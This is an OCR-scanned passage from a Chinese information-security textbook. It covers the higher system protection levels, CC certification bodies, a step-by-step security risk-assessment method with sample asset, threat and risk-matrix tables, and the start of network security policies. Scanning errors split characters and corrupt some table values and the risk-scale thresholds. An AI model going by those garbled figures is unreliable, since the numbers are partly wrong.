接口 也 必须 明确 定义 ,使 其 设计 与 实现 能 经 受 更 充分 的 测试 和 更 完整 的 复审 ;加 强 了 鉴别 机 
制 ;支持 系统 管理 员 和 操作 员 的 职能 ;提供 可 信 设 施 管理 ;增强 了 配置 管理 控制 。 系 统 具 有 
相当 的 抗 渗透 能 力 。 

与 安全 标记 保护 级 相 比 ,主要 特征 有 如 下 几 点 。 

(1) 可 信 计 算 基 基于 一 个 明确 定义 的 形式 化 安全 保护 策略 。 

(2) 将 第 三 级 实施 的 (自主 或 强制 ) 访 问 控制 扩展 到 所 有 主体 和 客体 。 即 在 自主 访问 控 
制 方面 ,可 信 计 算 基 应 维护 由 外 部 主体 能 够 直接 或 间接 访问 的 所 有 资源 (例如 ,主体 、 存 储 客 
体 和 输入 输出 资源 ) 实 施 强制 访问 控制 ,为 这 些 主体 及 客体 指定 敏感 标记 ,这 些 标 记 是 等 级 
分 类 和 非 等 级 类 别 的 组 合 ,它们 是 实施 强制 访问 控制 的 依据 。 

(3) 审计 方面 : 
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。 计算 机 信息 系统 可 信 计 算 基 能 记录 下 述 事 件 : 使 用 身份 鉴别 机 制 ;将 客体 引入 用 户 
地 址 空间 (例如 ,打开 文件 ,程序 初始 化 ) ;删除 客体 ;由 操作 员 、 系 统管 理 员 或 系统 安 
全 管理 员 实 施 的 动作 ,以 及 其 他 与 系统 安全 有 关 的 事件 。 对 于 每 一 事件 ,其 审计 记 
录 包 括 事 件 的 日 期 和 时 间 、 用 户 、 事 件 类 型 .事件 是 否 成 功 。 对 于 身份 鉴别 事件 , 审 
计 记 录 包 含 请 求 的 来 源 ( 例 如 终端 标识 符 ) ;对 于 客体 引入 用 户 地 址 空间 的 事件 及 客 
体 删 除 事件 ,审计 记录 包含 客体 名 及 客体 的 安全 级 别 。 此 外 ,计算 机 信息 系统 可 信 
计算 基 具 有 审计 更 改 可 读 输 出 记号 的 能 力 。 
。 对 不 能 由 计算 机 信息 系统 可 信 计 算 基 独立 分 辨 的 审计 事件 ,审计 机 制 提供 审计 记录 
接口 ,可 由 授权 主体 调用 的 这 些 审计 记录 区 别 于 计算 机 信息 系统 可 信 计 算 基 独立 分 
辩 的 审计 记录 。 
。 计 算 机 信息 系统 可 信 计 算 基 能 够 审计 利用 隐蔽 存储 信道 时 可 能 被 使 用 的 事件 。 
(4) 数据 完整 性 : 计算 机 信息 系统 可 信 计 算 基 通过 自主 和 强制 完整 性 策略 ,阻止 非 授 
权 用 户 修改 或 破坏 敏感 信息 。 在 网 络 环境 中 ,使 用 完整 性 敏感 标记 来 确保 信息 在 传送 中 未 
受 损 。 
(5) 隐蔽 信道 分 析 : 系统 开发 者 应 彻底 搜索 隐蔽 存储 信道 ,并 根据 实际 测量 或 工程 估 
算 确 定 每 一 个 被 标识 信道 的 最 大 带宽 。 
(6) 可 信 路 径 : 对 用 户 的 初始 登录 和 鉴别 ,计算 机 信息 系统 可 信 计 算 基 在 它 与 用 户 之 
间 提 供 可 信和 通信 路 径 。 该 路 径 上 的 通信 中 能 由 该 用 户 初始 化 。 


5. 第 五 级 : 访问 验证 保护 级 


本 级 的 可 信 计 算 基 满足 引用 监视 器 需求 ,访问 监控 器 仲裁 主体 对 客体 的 全 部 访问 。 访 
问 监控 器 本 身 是 抗 自 改 的 ,必须 足够 小 ,能 够 分 析 和 测试 。 

为 了 满足 访问 监控 器 需求 ,可 信 计 算 基 在 其 构造 时 ,排除 那些 对 实施 安全 策略 来 说 并 非 
必要 的 代码 ;在 设计 和 实现 时 ,从 系统 工程 角度 将 其 复杂 性 降低 到 最 小 程度 ;支持 安全 提供 
系统 恢复 机 制 管 理 员 职 能 ;扩充 审计 机 制 , 当 发 生 与 安全 相关 的 事件 时 发 出 信号 ;提供 系统 
恢复 机 制 。 系 统 具 有 很 高 的 抗 渗透 能 力 。 

与 第 四 级 相 比 ,主要 区 别 如 下 。 

(1) 可 信 计 算 基 的 构造 方面 : 本 级 具有 访问 监控 器 。 访 问 监控 器 是 监视 主体 和 客体 之 
间 授 权 关 系 的 部 件 ,仲裁 主体 对 客体 的 全 部 访问 。 访 问 监控 器 必须 是 抗 自 改 的 ,并 且 是 可 分 
析 和 测试 的 。 

(2) 在 自主 访问 控制 方面 : 由 于 有 访问 监控 器 ,所 以 访问 控制 能 为 每 个 客体 指定 用 户 
和 用 户 组 ,并 规定 他 们 对 客体 的 访问 模式 。 没 有 存储 权 的 用 户 只 允许 由 授权 用 户 指定 对 客 
体 的 访问 权 。 

(3) 在 审计 方面 : 可 信 计 算 基 包含 能 够 监控 可 审计 安全 事件 发 生 与 积累 的 机 制 , 当 超 
过 阔 值 时 ,能够 立即 向 安全 管理 员 发 出 警报 。 如 果 这 些 与 安全 相关 的 事件 继续 发 生 或 积累 ， 
系统 应 以 最 小 的 代价 终止 它们 。 

(4) 可 信人 恢复 : 提供 过 程 和 机 制 , 保 证 计算 机 信息 系统 失效 或 中 断后 ,可 以 进行 不 损害 
任何 安全 保护 性 能 的 恢复 。 
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6.1.3 信息 安全 测评 认证 体系 


1. 一 般 国家 的 信息 安全 测评 认证 体系 


目前 世界 上 许多 国家 都 建立 了 国家 的 信息 安全 测评 认证 体系 。 图 6. 2 为 已 经 建立 CC 
信息 安全 测评 认证 体系 的 国家 信息 安全 测评 认证 机 构 组 织 的 一 般 结构 。 


国家 安全 /情报 部 站 | 国家 标准 化 部 门 


政府 授权 的 认证 机 构 


提交 报告 | | 技术 监督 


CC 评估 /测试 实验 室 
图 6.2 国家 信息 安全 测评 认证 机 构 组 织 的 一 般 结 构 


在 这 样 的 安全 测评 认证 组 织 结构 中 ,认证 机 构 是 核心 ,是 公正 的 第 三 方 ,负责 具体 管理 
信息 安全 产品 的 安全 性 评估 和 认证 ,并 颁发 认证 证 书 。 它 们 是 上 由 国家 标准 化 部 门 认 可 和 
授权 的 机 构 ,并 受 国 家 安全 和 情报 主管 部 门 的 监管 :下 委托 一 些 具 有 商业 性 质 的 CC 测试 实 
验 室 进 行 安 全 性 评估 和 认证 的 具体 实施 ,并 向 认证 机 构 提交 结果 。 


2. 国际 互 认 


1995 年 CC 项 目 组 成 立 了 CC 国际 互 认 工作 组 ,并 与 1997 年 制定 了 过 渡 性 互 认 协定 。 
目前 ,参加 CC 互 认 协定 (CCRA) 已 经 有 美国 的 NSA 和 NIST、 加 拿 大 的 CSE、 英 国 的 
CESG ,德国 的 GISA 法国 的 SCSSI、 新 西 兰 的 DSD, 以 及 澳大利亚 .荷兰 .西班牙 .意大利 、 
挪威 ,芬兰 .瑞典 .希腊 等 20 多 个 国家 的 政府 官方 组 织 。 目 前 CCRA 已 经 允许 政府 机 构 参 
与 或 授权 的 非 官方 组 织 参 加 。 


一 申请 


t 认证 中 心 受理 申请 
反馈 
由 | 允 | 专家 评估 、 静态 分 析 
A 方案 评估 报告 、 结 论 村 
行 | 批 | 报 Lt 告 、 结 放 
安全 核查 /系统 测试 
报 送 


被 测评 认证 单位 核查 报告 


图 6.3 中 国 国家 信息 安全 测评 认证 中 心 开 展 涉 密 信息 系统 认证 的 流程 
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3. 中 国 国 家 信息 安全 测评 认证 中 心 


中 国 国家 信息 安全 测评 认证 中 心 是 国家 授权 的 、 并 按照 CC 准则 建立 的 具有 第 三 方 性 
质 的 技术 机 构 。 它 代表 国家 ,并 依照 国家 认证 的 法 律 \ 法 规 和 信息 安全 管理 政策 ,对 信息 技 
术 .信息 系统 、 信 息 安全 产品 以 及 安全 服务 的 安全 性 实施 测试 .评估 和 认证 。 图 6. 3 为 中 国 
国家 信息 安全 测评 认证 中 心 开展 涉 密 信息 系统 认证 的 流程 。 


6.2 信息 系统 安全 风险 评估 


安全 管理 的 第 一 步 就 是 建立 一 个 全 局 的 安全 目标 ,然后 才能 围绕 这 个 总 体 目 标 指定 系 
统 的 安全 策略 。 但 是 ,由 于 信息 系统 的 重要 性 和 激烈 的 攻防 对 抗 ,使 得 信息 系统 的 脆弱 性 和 
威胁 不 可 避免 ,也 使 得 人 们 不 可 能 建立 完全 安全 的 、 没 有 风险 的 信息 系统 。 这 里 ,风险 就 是 
脆弱 性 和 威胁 的 总 和 。 一 个 现实 的 目标 则 是 ,通过 对 于 要 保护 的 资产 以 及 系统 受到 的 潜在 
威胁 的 分 析 , 把 系统 风险 降低 到 可 以 接受 的 水 平 。 这 就 是 信息 系统 安全 风险 评估 。 


6.2.1 信息 系统 安全 风险 评估 的 基本 问题 


1. 信息 系统 安全 风险 评估 的 目的 


系统 的 安全 强度 可 以 通过 风险 大 小 衡量 。 科 学 地 分 析 信 息 系 统 的 风险 ,综合 平衡 风险 
和 代价 的 过 程 就 是 信息 系统 安全 风险 评估 。 世 界 各 国信 息 化 的 经 验 表 明 : 

(1) 不 计 代 价 .片面 地 追求 系统 安全 是 不 切实 际 的 ; 

(2) 不 考虑 风险 存在 的 信息 系统 是 危险 的 ,是 要 付出 代价 ,甚至 是 灾难 性 代价 的 ; 

(3) 所 有 的 信息 系统 建设 的 生命 周期 都 应 当 从 安全 风险 评估 开始 。 

通过 信息 系统 安全 风险 评估 ,组 织 可 以 达到 如 下 目的 : 

(1) 了 解 组 织 信息 系统 的 管理 和 安全 现状 。 

(2) 确定 资产 威胁 源 的 分 布 ,如 入 侵 者 、 内 部 人 员 、 自 然 灾害 等 ;确定 其 实施 的 可 能 性 ; 
分 析 威 胁 发 生 后 ,资产 的 价值 损失 、 敏 感性 和 严重 性 ,确定 相应 级 别 ; 确 定 最 敏感 .最 重要 资 
产 在 威胁 发 生 后 的 损失 。 

(3) 了 解 系统 的 脆弱 性 分 布 。 

(4) 明晰 组 织 的 安全 需求 ,指导 建立 安全 管理 框架 ,合理 规划 安全 建设 计划 。 


2. 信息 系统 安全 风险 评估 时 机 


信息 系统 安全 风险 评估 是 信息 系统 每 个 生命 周期 的 起 点 和 动因 。 具 体 地 说 ,应 当 在 下 
面 的 一 些 时 机 进行 : 
(1) 要 设计 规划 或 升级 到 新 的 信息 系统 时 。 
(2) 给 目前 的 信息 系统 增加 新 的 应 用 或 新 的 扩充 (包括 进行 互联 ) 时 。 
(3) 发 生 一 次 安全 事件 后 。 
(4) 组 织 具有 结构 性 变动 时 。 
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(5) 按照 规定 或 某 些 特殊 要 求 对 信息 系统 的 安全 进行 评估 时 。 
3. 信息 系统 安全 风险 评估 参考 标准 


下 面 列举 了 进行 信息 系统 安全 风险 评估 时 可 以 参照 的 标准 : 

。 ASNZS 4306: 1999( 风 险 管理 指南 ) : 澳大利亚 和 新 西 兰 关于 风险 管理 的 标准 。 

。 NIST SP 800-30: 美国 国家 标准 和 技术 学 会 (NIST) 开 发 的 信息 系统 风险 管理 

指南 。 

NIST SP 800-26: 美国 国家 标准 和 技术 学 会 (NIST) 开 发 的 信息 系统 安全 自我 评估 

指南 。 

ISO 17799: 英国 标准 协会 (british standard institute, BSI) 开 发 ,后 成 为 信息 安全 管 

理 体系 的 国际 标准 。 

BS 7799-2: BSI 开发 的 信息 安全 管理 标准 。 

。 OCTAVE(Operationally Critical Threat, Asset,and Vulnerability Evaluation) : 美 
国 卡 内 基 。 梅 隆 大 学 软件 工程 学 院 开 发 的 一 种 风险 评估 方法 。 

。 BS 15000(ITIL) : 信息 系统 服务 管理 。 

。 ISO 13335: 信息 技术 安全 管理 指南 。 

。 G51: 安全 风险 评估 及 审计 指南 。 

。 ISO 15408/CC。 

。 GB/T 18336: 国家 标准 : 信息 技术 、 安 全 技术 .信息 技术 安全 性 评估 准则 。 

。 GB 17859-1999: 国家 标准 计算 机 信息 系统 安全 保护 等 级 划分 准则 。 


4. 信息 系统 安全 风险 评估 准则 


在 信息 系统 安全 风险 评估 中 ,应 当 遵循 如 下 一 些 原 则 。 

(1) 规范 性 原则 ,具有 3 层 含义 : 

。 评估 方案 和 实施 ,要 根据 有 关 标 准 进行 。 

。 选择 的 评估 部 门 需要 被 国家 认可 ,并 具有 一 定 等 级 的 资质 。 
。 评估 过 程 和 文档 要 规范 。 

(2) 整体 性 原则 ,评估 要 从 业务 的 整体 需求 出 发 ,不 能 局 限于 某 些 局 部 。 
(3) 最 小 影响 原则 ,包含 如 下 意义 : 

。 评估 要 有 充分 的 计划 性 ,不 对 系统 运行 产生 显著 影响 

。 所 使 用 的 评估 工具 要 经 过 多 次 使 用 考验 ,具有 很 好 的 可 控 性 。 
(4) 保密 性 原则 ,包含 如 下 方面 : 

。 对 评估 数据 严格 保密 ; 

。 不 得 泄露 参评 人 员 资 料 ; 

。 不 得 使 用 评估 数据 对 被 评 方 造成 利益 损失 。 


5. 信息 系统 安全 风险 评估 模式 


安全 评估 模式 是 进行 安全 风险 评估 时 应 当 遵循 的 操作 过 程 和 方式 。 每 个 组 织 应 当 根据 
自己 的 信息 系统 的 环境 选择 适当 的 评估 模式 。 下 面 是 几 种 常用 的 风险 评估 模式 。 
， 245 。 


(1) 基线 评估 (baseline risk assessment) 
安全 基线 评估 就 是 按照 标准 或 惯例 进行 评估 。 例 如 按照 下 列 标准 规范 或 者 惯例 : 
。 国际 标准 和 国家 标准 ,例如 BS7799-1.GB/T 18336-2001 等 ; 
。 行业 标准 或 推荐 ,例如 德国 联邦 安全 局 IT 基线 保护 手册 等 ; 
。 其 他 类 似 商业 目标 和 规模 组 织 惯例 。 
采用 基线 安全 风险 评估 ,组 织 应 当 根 据 行业 性 质 、 业 务 环境 等 实际 情况 ,用 安全 极限 的 
规定 对 自己 的 信息 系统 的 安全 措施 进行 检查 , 找 出 差距 ,得 到 基本 的 安全 需求 。 
安全 基线 规定 适合 于 特定 环境 下 的 所 有 系统 。 采 用 基线 安全 风险 评估 ,可 以 满足 基本 
的 安全 需求 ,使 系统 达到 一 定 强度 的 安全 防护 水 平 。 这 种 评估 模式 需要 的 资源 少 ,评估 周期 
短 ,操作 简单 ,是 最 经 济 有 效 的 风险 评估 模式 。 但 是 ,基线 水 平 的 高 低 确定 困难 。 
(2) 详细 评估 
详细 评估 就 是 对 信息 系统 中 的 所 有 资源 都 进行 仔细 的 评估 。 例 如 可 以 划分 成 如 下 方面 
进行 安全 风险 评估 : 
。 网 络 安全 风险 评估 ,可 以 按照 了 解 拓扑 结构 .获取 公共 访问 机 器 名 字 和 地 址 、 进 行 端 
口 扫描 的 顺序 进行 。 
。 平台 安全 风险 评估 ,包括 认证 基准 配置 .操作 系统 .网 络 服务 有 无 改变 ,认证 管理 员 
口令 ,并 测试 口令 的 强度 ,跟踪 审计 子 系统 ,评估 数据 库 等 。 
。 应 用 安全 评估 ,这 种 评估 包括 了 资产 的 坚定 和 评估 ,资产 面临 威胁 的 评估 、 安 全 薄弱 
环节 的 分 析 , 并 在 这 些 评 估 分 析 的 基础 上 进行 最 后 的 风险 评估 分 析 , 最 后 制定 出 合 
适 的 安全 策略 。 它 体现 了 风险 管理 的 思想 ,能 识别 资产 的 风险 并 将 风险 降低 到 可 以 
接受 的 水 平 。 
但 是 ,这 种 模式 需要 相当 多 的 财力 、 物 力 . 时 间 、 精 力 和 专业 能 力 的 投入 ,最 后 获得 的 结 
果 有 可 能 有 一 定 的 时 间 滞 后 。 
(3) 组 合 评估 
组 合 评估 是 上 述 两 种 模式 的 结合 。 它 首先 对 所 有 信息 系统 进行 一 次 较 高 级 别 的 安全 分 
析 ,并 关注 每 一 个 实际 分 析 对 整个 业务 的 价值 以 及 它 所 面临 的 风险 的 程度 。 然 后 鉴定 对 业 
务 非常 重要 或 面临 严重 风险 的 部 分 进行 详细 评估 分 析 , 对 其 他 部 分 进行 极限 评估 分 析 。 这 
种 方法 注意 了 耗费 与 效率 之 间 的 平衡 ,还 注意 了 高 风险 系统 的 安全 防范 。 


6.2.2 信息 系统 安全 风险 评估 过 程 
信息 系统 安全 风险 评估 是 确定 信息 系统 安全 需求 的 过 程 , 它 包括 图 6.4 所 示 的 几 个 


阶段 。 
下 面 对 信 息 系 统 安全 风险 评估 各 个 阶段 的 工作 进行 说 明 。 


1. 制定 项 目 计划 
评估 工作 从 制定 项 目 计 划 开 始 。 项 目 计划 应 当 包 括 如 下 一 些 内 容 。 
(1) 评估 目标 ; 进行 安全 风险 评估 的 目的 和 期 望 。 


(2) 项 目 范围 和 边界 : 例如 通过 定义 系统 的 连接 和 接口 。 
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制定 计划 


现 有 安全 控制 分 析 


可 能 性 分 析 


影响 分 析 


确定 安全 风险 


图 6.4 信息 系统 安全 风险 评估 过 程 


(3) 约束 条 件 : 包括 时 间 ( 是 否 要 在 非 繁忙 办 公 时 间 , 甚 至 非 工作 时 间 进 和 


算 .技术 因素 等 。 这 些 约束 可 能 影响 项 目 进度 和 评估 的 可 用 资源 。 
(4) 建立 资产 价值 (重要 性 或 敏感 度 ) 评 估 标 准 。 
(5) 风险 接受 标准 : 明确 组 织 可 以 接受 的 风险 的 水 平 或 等 级 。 
(6) 确定 风险 评估 的 模式 。 
(7) 项 目 进度 安排 : 用 来 控制 进度 ,监督 项 目 过 程 。 


2. 评估 准备 


制定 风险 评估 计划 之 后 ,要 为 实施 风险 评估 做 准备 工作 。 
(1) 成 立 一 个 专门 的 风险 评估 小 组 ,成 员 包 括 : 
。， 具 有 风险 评估 经 验 者 。 

熟悉 组 织 运 作者 。 

管理 层 、 业 务 部 门 的 成 员 。 

。 IT 系统 代表 。 

。 用 户 代表 。 

。 外 部 风险 评估 专家 。 

。 组织 的 信息 安全 官员 和 安全 管理 人 员 。 

。 组 织 的 高 层 管理 人 员 。 

同时 要 进行 分 工 ,明确 责任 。 


(2) 收集 资料 : 围绕 项 目的 范围 ,收集 相关 资料 。 收 集 方法 包括 : 


。 问 卷 调查 。 
。 对 各 级 人 员 访 谈 。 
。 小 组 讨论 。 


) 


、 财 务 预 


。 查阅 文档 (政策 法 规 \ 设 计 资 料 、 操 作 指 南 、 审 计 记录 ,安全 策略 、 应 急 预 案 、 以 前 的 评 


估 结 果 等 ) 。 
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”。 现场 勘察 : 观察 各 类 人 员 的 行为 .环境 状况 、 操 作 情 形 , 寻 找 不 良 行为 (如 违反 安全 
策略 的 现象 ) 。 
(3) 材料 准备 : 为 风险 评估 过 程 设计 拟定 标准 化 的 表格 .模板 、 问 卷 等 。 


3. 确定 资产 


如 前 所 述 , 资 产 的 形式 包括 : 
。 各 种 文档 ,包括 数据 库 和 数据 文件 、 系 统 文件 .用 户 手册 、 培 训 资 料 、 支 持 程序 应急 
计划 等 。 

。 纸 质 文件 ,包括 合同 、 策 略 方针 、 企 业 文件 .重要 商业 结果 等 。 

。 软件 ,包括 应 用 软件 ,系统 软件 .开发 工具 .公用 程序 等 。 

”物理 资产 。 

资产 的 确定 应 当 从 关键 业务 开始 ,最 终 覆 盖 所 有 关键 资产 。 在 实际 操作 时 ,可 以 根据 关 
键 业 务 流 程 确定 资产 清单 。 

得 到 完整 的 资产 清单 后 ,要 进一步 确定 每 项 资产 的 价值 。 资 产 的 价值 用 资产 对 于 组 织 
的 重要 性 或 敏感 度 衡量 。 为 了 保证 资产 评估 的 一 致 性 和 准确 性 ,组织 应 当 建立 一 个 资产 评 
估 标 准 ,对 资产 进行 等 级 划分 。 表 6. 3 是 一 个 资产 敏感 度 等 级 划分 标准 范例 。 


表 6.3 一 个 资产 敏感 度 等 级 划分 标准 范例 


等 级 名 称 描 述 
5 巨 造成 灾难 性 损失 ,导致 组 织 停顿 ,决策 层 免职 
4 大 造成 重大 经 济 损失 ,造成 产品 和 服务 大 幅度 缩减 ,形象 受 损 ,土气 低落 
3 中 对 组 织造 成 引起 重视 的 损失 ,市 场 有 一 定 程度 的 反映 ,士气 受到 影响 
2 小 对 部 分 产品 或 服务 出 现 影响 ,受到 外 部 批评 
1 微 出 现 影响 ,基本 不 构成 负面 效应 


4. 脆弱 性 (漏洞 ) 分 析 


(1) 脆弱 性 分 类 
。 技术 性 脆弱 性 : 系统 软 硬 件 中 存在 的 漏洞 或 缺陷 。 
。 操作 性 脆弱 性 : 系统 在 配置 操作、 使 用 中 的 缺陷 ,包括 操作 人 员 的 不 良 习 惯 .缺乏 
审计 或 备份 等 。 
。 管理 性 脆弱 性 : 组 织 结构 、 人 员 意 识 .规章 制度 、 策 略 计划 等 方面 的 不 足 。 
(2) 脆弱 性 分 析 手 段 
@ 技术 性 脆弱 性 分 析 手 段 
。 采用 工具 进行 网 络 扫描 。 
。 主机 审计 : 采用 脚本 工具 或 人 工 方式 对 网 络 设备 、 主 机 数据库 进行 列 目 式 排查 。 
。 渗透 测试 人 工 模拟 黑客 攻击 ,进行 排查 。 
。 系统 分 析 : 进行 网 络 结 构 和 边界 分 析 。 
@ 非 技 术 性 脆弱 性 主要 采用 调查 表 查看 文件 .访谈 和 现场 勘察 手段 进行 。 
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5. 威胁 分 析 


威胁 是 对 系统 或 资产 的 保密 性 、 完 整 性 以 及 可 用 性 构成 潜在 损害 的 事件 。 威 胁 分 析 的 
目的 是 在 明确 关键 资产 ,并 描述 它们 的 安全 需求 的 情况 下 ,确定 这 些 关 键 资产 面临 的 威胁 ， 
并 界定 发 生 威胁 的 可 能 性 以 及 对 系统 或 资产 的 破坏 性 潜力 。 

(1) 威胁 源 等 级 

为 了 描述 方便 ,对 威胁 源 要 进行 分 类 。 表 6. 4 是 一 个 威胁 源 分 类 范例 。 


表 6.4 一 个 威胁 源 分 类 范例 
编号 名 称 描 述 
不 可 抗拒 的 自然 灾害 (地 震 、 飓 风 等 )、 环 境 (电力 中 断 \ 污 染 等 ) .政治 ,战争 等 
因 组 织 、 体 制 或 制度 缺陷 造成 的 安全 威胁 
因 人 的 素质 、 技 能 等 形成 的 安全 威胁 
因 技 术 缺 陷 形 成 的 安全 威胁 
人 为 的 侵害 行为 


wNv- 


(2) 威胁 获取 途径 

威胁 获取 可 以 通过 下 列 途 径 进 行 : 
。 查看 安全 策略 文档 。 

。 业务 流程 分 析 。 

。 网 络 拓扑 分 析 。 

。 人 员 访 谈 。 

。 入 侵 检测 系统 收集 信息 分 析 。 
。 人 工分 析 等 。 


6. 现 有 安全 控制 分 析 


对 于 现 有 (在 规划 中 的 或 已 经 实现 的 ) 安 全 控制 措施 进行 分 析 的 目的 是 ,通过 分 析 这 些 
控制 ,减少 或 消除 一 个 威胁 源 利用 系统 脆弱 性 的 可 能 性 。 

(1) 安全 控制 措施 的 类 型 

@ 按照 性 质 分 为 以 下 几 种 。 

。 管 理性 (administrative): 包括 安全 策略 ,程序 管理 、 风 险 管理 ,安全 保障 、 系 统 生 命 
周期 管理 等 。 

。 操作 性 (operational) : 包括 人 员 职 责 、 应 急 响 应 、 事 件 处 理 、 意 识 教育 、 系 统 支持 和 操 
作 、 物 理 和 环境 安全 等 。 

。 技术 性 (technical) : 加 密 、 认 证 ,访问 控制 审计 等 。 

@ 按照 功能 分 为 以 下 几 种 。 

。 预防 性 (preventive) : 阻止 对 安全 策略 的 犯罪 ,包括 访问 控制 ,加密 和 认证 等 。 

。 检测 性 (detective) : 检测 并 及 时 发 现 对 安全 策略 的 违犯 或 企图 ,并 发 出 警告 ,具有 一 
定 威慑 性 (deterrent) ,如 入 侵 检 测 审计 跟 踪 、 校 验 和 、 蜜 钠 技 术 等 。 
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《2 方法 

设计 一 个 安全 要 求 核对 表 , 系 统 化 地 进行 有 效 的 分 析 ,验证 安全 是 否 与 即 定 法 规 和 政策 
一 致 。 

(3) 结果 

输出 信息 系统 已 经 实现 或 计划 实现 的 安全 控制 清单 。 


7. 可 能 性 及 影响 分 析 


可 能 性 (ikelihood) 和 影响 (impact) 是 威胁 的 两 个 属性 ,也 是 评估 风险 的 两 个 关键 因 
素 。 可 能 性 指 威胁 发 生 的 可 能 性 ,影响 指 威胁 用 于 确定 风险 发 生 对 系统 资产 破坏 或 影响 的 
程度 。 

(1) 可 能 性 分 析 

可 能 性 分 析 是 对 威胁 发 生 概 率 的 估计 ,要 结合 威胁 源 的 动机 和 能 力 、 脆 弱 性 的 性 质 和 安 
全 控制 存在 与 有 效 性 进行 综合 评估 。 通 常 采用 经 验 分 析 或 定性 分 析 的 方法 确定 。 

为 了 便于 分 析 ,应 当 制 定 一 个 威胁 的 可 能 性 等 级 标准 。 表 6. 5 是 一 个 威胁 的 可 能 性 等 
级 范例 。 


表 6.5 一 个 威胁 的 可 能 性 等 级 范例 


等 级 名 称 等 级 权重 描 ” 述 

A 频繁 1,0 大 多 数 情 况 下 会 发 生 
B 经 常 0:7 多 数 情 况 下 很 可 能 发 生 
C 有 时 QS 有 时 会 发 生 

D 很 少 ds 有 时 可 能 发 生 

E 个 别 Qi 特殊 情况 下 发 生 


(2) 影响 分 析 

影响 分 析 已 经 在 确定 资产 阶段 用 资产 的 敏感 性 进行 了 描述 。 需 要 说 明 的 是 ,影响 分 析 
可 以 用 定性 和 定量 两 种 方法 进行 。 

定性 影响 分 析 只 用 级 别 描述 威胁 的 影响 ,这 样 可 以 对 风险 进行 排序 ,并 能 够 立即 对 那些 
需要 改善 的 环节 进行 标识 。 定 量 分 析 可 以 计算 影响 的 大 小 ,以 便 用 成 本 效益 分 析 进 行 成 本 
控制 。 


8. 确定 安全 风险 


确定 安全 风险 的 目的 是 评估 信息 系统 的 安全 风险 级 别 。 

(1) 风险 级 别 和 措施 

信息 系统 风险 级 别 最 多 划分 为 4 级 ,并 用 颜色 表示 ,如 表 6.6 所 示 。 

(2) 风险 级 别 矩 阵 

将 风险 的 可 能 性 (概率 ) 与 威胁 的 级 别 相 乘 ,可 以 得 到 最 终 使 命 风 险 , 从 而 可 以 得 到 总 的 
风险 等 级 。 表 6. 7 是 一 个 计算 范例 。 
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表 6.6 信息 系统 风险 级 别 和 行动 措施 


级 别 符号 /颜色 名 称 建议 的 行动 措施 
E/ 红 色 极度 风险 立即 采取 措施 :避免 ? 转移 ? 降低 
H/ 检 色 高 风险 需要 尽快 部 署 行动 :避免 ?3 转移 ? 降低 
eR re i 
M/ 黄 色 中 风险 a te 个 计划 实施 行动 :避免 ? 接 
L/ 绿 色 低 风 险 按 常 规 处 理 : 避 免 ? 接受 ? 转移 ? 降低 
表 6.7 一 个 风险 级 别 和 矩阵 计算 范例 
影 响 

可 能 性 微 小 中 大 巨 

2 3 4 5 
A(l.0) 1.0 多半 3 4.0 5.0 
B(0.7) 入 全 1.4 2.1 2.8 3.5 
C(0.5) 0.5 区 1.5 2.0 2.5 
D(0. 3) 0. 3 0.6 0.9 | 1.5 
E(0.1) 0.1 G2 0.3 0.4 0.5 
(3) 确定 风险 尺度 
一 个 范例 : 
。 E: 4.5~5.0; 
“ Hr Ds 
» M1.0~3.55 
“Lit ll 
按照 风险 尺度 ,将 符号 标 进 风险 矩阵 ,得 到 结果 如 表 6. 8 所 示 。 

表 6.8 一 个 风险 级 别 矩 阵 结果 
影 响 

可 能 性 微 小 中 大 巨 

1 2 3 4 5 
A(1.0) M(1.0) M(2.0) M(3.0) H(4.0) E(5.0) 
B(0.7) IO M(1.4) M(2.1) M(2. 8) H(3.5) 
C(0.5) L(0.5) M(1.0) M(1.5) M(2.0) M(2.5) 
D(0.3) L(0. 3) L(0.6) L(0.9) M(1.2) M(1. 5) 
E(0.1) L(0.1) L(0.2) L(0.3) L(0.4) L(0.5) 


9. 形成 评估 报告 


风险 评估 报告 内 容 一 般 包括 : 

(1) 概述 : 评估 目的 、 方 法、 过 程 等 。 

(2) 评估 结果 : 包括 资产 .威胁 脆弱 性 、 现 有 安全 控制 措施 等 级 、 风 险 评 估 等 。 

(3) 安全 控制 建议 和 备 选 解决 方案 。 

前 两 项 的 内 容 已 经 介绍 ,在 对 安全 控制 建议 和 备 选 解决 方案 提出 建议 时 应 当 考 虑 的 内 


。 建议 的 选项 在 兼容 性 等 方面 的 有 效 性 。 
。 与 法 律 法 规 的 符合 性 。 

。 组织 及 策略 方面 的 可 接受 性 。 

。 对 运行 的 影响 。 

。 安 全 性 和 可 靠 性 。 


6.3 信息 系统 安全 策略 


信息 系统 是 复杂 的 ,信息 系统 的 安全 也 是 复杂 的 。 可 以 说 ,有 多 么 复杂 的 信息 系统 ,就 
有 多 么 复杂 的 信息 系统 安全 。 为 此 ,在 制定 安全 措施 时 必须 考虑 一 套 科 学 的 .系统 的 安全 策 
咯 (security policy) 。 

安全 策略 是 控制 和 管理 主体 对 客体 访问 时 ,为 安全 目的 而 制定 的 一 组 规则 和 目标 约束 ， 
以 及 为 达到 安全 目的 而 采取 的 步骤 。 安全 策略 可 以 反映 一 个 组 织 或 一 个 系统 的 安全 需求 。 
信息 安全 策略 的 制定 应 以 信息 系统 为 对 象 ,根据 风险 分 析 确 立 安全 方针 ,并 依照 这 个 方针 制 
定 相 应 的 策略 。 下 面 是 中 国信 息 安全 产品 评测 认证 中 心 提 出 的 系统 采取 的 安全 策略 , 供 安 
全 管理 人 员 制 定 系统 安全 策略 时 参考 。 具 体制 定 系统 的 安全 策略 时 ,可 以 根据 风险 分 析 , 从 
中 选择 必要 的 内 容 , 同 时 根据 需求 追加 一 部 分 内 容 。 


6.3.1 基于 网 络 的 安全 策略 
管理 者 为 防止 对 网 络 的 非法 访问 或 非 授 权 用 户 使 用 的 情况 发 生 ,应 采取 以 下 策略 。 
1. 监视 日 志 


(1) 读 取 上 日志, 根据 日 志 的 内 容 至 少 可 确定 访问 者 的 情况 ; 
(2) 确保 日 志 本 身 的 安全 ; 

(3) 对 日 志 进 行 定期 检查 ; 

(4) 应 将 日 志保 存 到 下 次 检查 时 。 


2. 对 不 正当 访问 的 检测 功能 


当 出 现 不 正当 访问 时 应 设置 能 够 将 其 查 出 并 通知 风险 管理 者 的 检测 功能 。 
(1) 设置 对 网 络 及 主机 等 工作 状态 的 监控 功能 ; 
(2) 车 利用 终端 进行 访问 , 则 对 该 终端 设置 指定 功能 ; 
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(3) 设置 发 现 异 常情 况 时 能 够 使 网 络 .主机 等 停止 工作 的 功能 。 
3. 口令 


